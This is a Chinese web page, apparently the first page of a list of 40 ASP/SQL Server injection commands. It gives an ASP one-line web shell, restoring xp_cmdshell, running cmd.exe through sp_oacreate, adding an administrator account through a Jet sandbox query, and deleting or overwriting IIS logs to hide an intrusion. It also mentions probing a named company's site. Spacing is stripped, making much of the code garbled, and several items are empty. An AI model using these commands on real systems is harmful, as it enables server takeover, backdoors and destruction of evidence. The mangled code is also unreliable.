ASP注入详细命令40条第12页

　　1、用^转义字符来写ASP(一句话木马)文件的方法:


echo^<%execute^(request^(l^)^)%^>>c:\mu.asp

2、显示SQL系统版本：
?
?

MicrosoftVBScript编译器错误错误800a03f6
缺少End
/iisHelp/common/500-100.asp，行242
MicrosoftOLEDBProviderforODBCDrivers错误80040e07
[Microsoft][ODBCSQLServerDriver][SQLServer]SyntaxerrorconvertingthenvarcharvalueMicrosoftSQLServer2000-8.00.760(IntelX86)Dec17200214:22:05Copyright(c)1988-2003MicrosoftCorporationDesktopEngineonWindowsNT5.0(Build2195:ServicePack4)toacolumnofdatatypeint.
/display.asp，行17
3、在检测索尼中国的网站漏洞时，分明已经确定了漏洞存在却无法在这三种漏洞中找到对应的类型。偶然间我想到了在SQL语言中可以使用in关键字进行查询，例如select*frommytablewhereidin(1)，括号中的值就是我们提交的数据，它的结果与使用select*frommytablewhereid=1的查询结果完全相同。所以访问页面的时候在URL后面加上)and1=1and1in(1后原来的SQL语句就变成了select*frommytablewhereidin(1)and1=1and1in(1)，这样就会出现期待已久的页面了。暂且就叫这种类型的漏洞为包含数字型吧，聪明的你一定想到了还有包含字符型呢。对了，它就是由于类似select*frommytablewherenamein(firstsee)的查询语句造成的。

4、判断xp_cmdshell扩展存储过程是否存在：

恢复xp_cmdshell扩展存储的命令：

;execmaster.dbo.sp_addextendedprocxp_cmdshell,e:\inetput\web\xplog70.dll;--

5、向启动组中写入命令行和执行程序：



6、查看当前的数据库名称：
?改成0,1,2,3……就可以跨库了
?
MicrosoftVBScript编译器错误错误800a03f6
缺少End
/iisHelp/common/500-100.asp，行242
MicrosoftOLEDBProviderforODBCDrivers错误80040e07
[Microsoft][ODBCSQLServerDriver][SQLServer]Syntaxerrorconvertingthenvarcharvaluehuidahousetoacolumnofdatatypeint.
/display.asp，行17
7、列出当前所有的数据库名称：
select*frommaster.dbo.sysdatabases列出所有列的记录
selectnamefrommaster.dbo.sysdatabases仅列出name列的记录

8、不需xp_cmdshell支持在有注入漏洞的SQL服务器上运行CMD命令：
createTABLEmytmp(infoVARCHAR(400),IDintIDENTITY(1,1)NOTNULL)
DECLARE@shellINT
DECLARE@fsoINT
DECLARE@fileINT
DECLARE@isEndBIT
DECLARE@outVARCHAR(400)
EXECsp_oacreatewscript.shell,@shelloutput
EXECsp_oamethod@shell,run,null,cmd.exe/cdirc:\>c:\temp.txt,0,true
--注意run的参数true指的是将等待程序运行的结果，对于类似ping的长时间命令必需使用此参数。

EXECsp_oacreatescripting.filesystemobject,@fsooutput
EXECsp_oamethod@fso,opentextfile,@fileout,c:\temp.txt
--因为fso的opentextfile方法将返回一个textstream对象，所以此时@file是一个对象令牌

WHILE@shell>0
BEGIN
EXECsp_oamethod@file,Readline,@outout
insertINTOMYTMP(info)VALUES(@out)
EXECsp_oagetproperty@file,AtEndOfStream,@isEndout
IF@isEnd=1BREAK
ELSECONTINUE
END

dropTABLEMYTMP

----------
DECLARE@shellINT
DECLARE@fsoINT
DECLARE@fileINT
DECLARE@isEndBIT
DECLARE@outVARCHAR(400)
EXECsp_oacreatewscript.shell,@shelloutput
EXECsp_oamethod@shell,run,null,cmd.exe/ccscriptC:\Inetpub\AdminScripts\adsutil.vbsset/W3SVC/InProcessIsapiAppsC:\WINNT\system32\idq.dllC:\WINNT\system32\inetsrv\httpext.dllC:\WINNT\system32\inetsrv\httpodbc.dllC:\WINNT\system32\inetsrv\ssinc.dllC:\WINNT\system32\msw3prt.dllC:\winnt\system32\inetsrv\asp.dll>c:\temp.txt,0,true
EXECsp_oacreatescripting.filesystemobject,@fsooutput
EXECsp_oamethod@fso,opentextfile,@fileout,c:\temp.txt
WHILE@shell>0
BEGIN
EXECsp_oamethod@file,Readline,@outout
insertINTOMYTMP(info)VALUES(@out)
EXECsp_oagetproperty@file,AtEndOfStream,@isEndout
IF@isEnd=1BREAK
ELSECONTINUE
END

以下是一行里面将WEB用户加到管理员组中：
DECLARE@shellINTDECLARE@fsoINTDECLARE@fileINTDECLARE@isEndBITDECLARE@outVARCHAR(400)EXECsp_oacreatewscript.shell,@shelloutputEXECsp_oamethod@shell,run,null,cmd.exe/ccscriptC:\Inetpub\AdminScripts\adsutil.vbsset/W3SVC/InProcessIsapiAppsC:\WINNT\system32\idq.dllC:\WINNT\system32\inetsrv\httpext.dllC:\WINNT\system32\inetsrv\httpodbc.dllC:\WINNT\system32\inetsrv\ssinc.dllC:\WINNT\system32\msw3prt.dllC:\winnt\system32\inetsrv\asp.dll>c:\temp.txt,0,trueEXECsp_oacreatescripting.filesystemobject,@fsooutputEXECsp_oamethod@fso,opentextfile,@fileout,c:\temp.txtWHILE@shell>0BEGINEXECsp_oamethod@file,Readline,@outoutinsertINTOMYTMP(info)VALUES(@out)EXECsp_oagetproperty@file,AtEndOfStream,@isEndoutIF@isEnd=1BREAKELSECONTINUEEND

以下是一行中执行EXE程序：

SQL下三种执行CMD命令的方法：

先删除7.18号日志：
(1)execmaster.dbo.xp_cmdshelldelC:\winnt\system32\logfiles\W3SVC5\ex050718.log>c:\temp.txt

(2)DECLARE@shellINTDECLARE@fsoINTDECLARE@fileINTDECLARE@isEndBITDECLARE@outVARCHAR(400)EXECsp_oacreatewscript.shell,@shelloutputEXECsp_oamethod@shell,run,null,cmd.exe/cdelC:\winnt\system32\logfiles\W3SVC5\ex050718.log>c:\temp.txt,0,trueEXECsp_oacreatescripting.filesystemobject,@fsooutputEXECsp_oamethod@fso,opentextfile,@fileout,c:\temp.txtWHILE@shell>0BEGINEXECsp_oamethod@file,Readline,@outoutinsertINTOMYTMP(info)VALUES(@out)EXECsp_oagetproperty@file,AtEndOfStream,@isEndoutIF@isEnd=1BREAKELSECONTINUEEND

（3）首先开启jet沙盘模式，通过扩展存储过程xp_regwrite修改注册表实现，管理员修改注册表不能预防的原因。出于安全原因，默认沙盘模式未开启，这就是为什么需要xp_regwrite的原因，而xp_regwrite至少需要DB_OWNER权限，为了方便，这里建议使用sysadmin权限测试：
?execmaster..xp_regwriteHKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Jet\4.0\Engines,SandBoxMode,REG_DWORD,1
注：
0禁止一切（默认）
1使能访问ACCESS，但是禁止其它
2禁止访问ACCESS，但是使能其他
3使能一切

?这里仅给出sysadmin权限下使用的命令：
select*fromopenrowset(microsoft.jet.oledb.4.0,;database=c:\winnt\system32\ias\ias.mdb,selectshell(cmd.exe/cnetuseradminadmin1234/add))


?建立链接数据库L0op8ack参考命令：
EXECsp_addlinkedserverL0op8ack,OLEDBProviderforJet,Microsoft.Jet.OLEDB.4.0,c:\windows\system32\ias\ias.mdb

?如何使用链接数据库：

使用这个方式可以执行，但是很不幸，DB_OWNER权限是不够的，需要至少sysadmin权限或者securityadmin+setupadmin权限组合
sp_addlinkedserver需要sysadmin或setupadmin权限
sp_addlinkedsrvlogin需要sysadmin或securityadmin权限
最终发现，还是sa权限或者setupadmin+securityadmin权限帐户才能使用，
一般没有哪个管理员这么设置普通帐户权限的

实用性不强，仅作为一个学习总结吧

大致过程如下，如果不是sysadmin，那么IAS.mdb权限验证会出错，
我测试的时候授予hacker这个用户setupadmin+securityadmin权限，使用ias.mdb失败
需要找一个一般用户可访问的mdb才可以：

?新建链接服务器L0op8ack:EXECsp_addlinkedserverL0op8ack,JetOLEDB,Microsoft.Jet.OLEDB.4.0,c:\winnt\system32\ias\ias.mdb;--
?execsp_addlinkedsrvloginL0op8ack,false;--或
execsp_addlinkedsrvloginL0op8ack,false,NULL,test1,ptlove;--
?select*FROMOPENQUERY(L0op8ack,selectshell(cmd.exe/cnetuser));--
?execsp_droplinkedsrvloginL0op8ack,false;--
?execsp_dropserverL0op8ack;--

再考贝一个其它文件来代替7.18日文件：
(1)execmaster.dbo.xp_cmdshellcopyC:\winnt\system32\logfiles\W3SVC5\ex050716.logC:\winnt\system32\logfiles\W3SVC5\ex050718.log>c:\temp.txt

(2)DECLARE@shellINTDECLARE@fsoINTDECLARE@fileINTDECLARE@isEndBITDECLARE@outVARCHAR(400)EXECsp_oacreatewscript.shell,@shelloutputEXECsp_oamethod@shell,run,null,cmd.exe/ccopyC:\winnt\system32\logfiles\W3SVC5\ex050716.logC:\winnt\system32\logfiles\W3SVC5\ex050718.log>c:\temp.txt,0,trueEXECsp_oacreatescripting.filesystemobject,@fsooutputEXECsp_oamethod@fso,opentextfile,@fileout,c:\temp.txtWHILE@shell>0BEGINEXECsp_oamethod@file,Readline,@outoutinsertINTOMYTMP(info)VALUES(@out)EXECsp_oagetproperty@file,AtEndOfStream,@isEndoutIF@isEnd=1BREAKELSECONTINUEEND

(3)DECLARE@shellINTDECLARE@fsoINTDECLARE@fileINTDECLARE@isEndBITDECLARE@outVARCHAR(400)EXECsp_oacreatewscript.shell,@shelloutputEXECsp_oamethod@shell,run,null,cmd.exe/cnetuser>c:\temp.txt,0,trueEXECsp_oacreatescripting.filesystemobject,@fsooutputEXECsp_oamethod@fso,opentextfile,@fileout,c:\temp.txtWHILE@shell>0BEGINEXECsp_oamethod@file,Readline,utoutinsertINTOMYTMP(info)VALUES(@out)EXECsp_oagetproperty@file,AtEndOfStream,@isEndoutIF@isEnd=1BREAKELSECONTINUEEND
12下一页阅读全文